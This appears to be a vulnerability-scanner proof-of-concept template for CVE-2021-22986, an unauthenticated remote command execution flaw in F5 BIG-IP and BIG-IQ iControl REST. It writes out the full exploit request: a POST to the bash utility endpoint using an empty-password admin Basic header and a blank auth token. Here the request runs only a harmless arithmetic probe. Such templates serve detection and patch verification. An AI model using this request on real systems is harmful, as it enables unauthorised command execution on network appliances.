On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.
PoC代码[已公开]
id: CVE-2021-22986
info:
name: F5 BIG-IP iControl REST unauthenticated RCE
author: Hex
severity: critical
description: |-
On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22986
tags: cve,cve2021,f5,bigip,rce
created: 2021/04/20
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
rules:
r0:
request:
method: POST
path: /mgmt/tm/util/bash
headers:
Authorization: Basic YWRtaW46
Content-Type: application/json
X-F5-Auth-Token: " "
body: '{"command":"run","utilCmdArgs":"-c ''expr {{r1}} + {{r2}}''"}'
expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
expression: r0()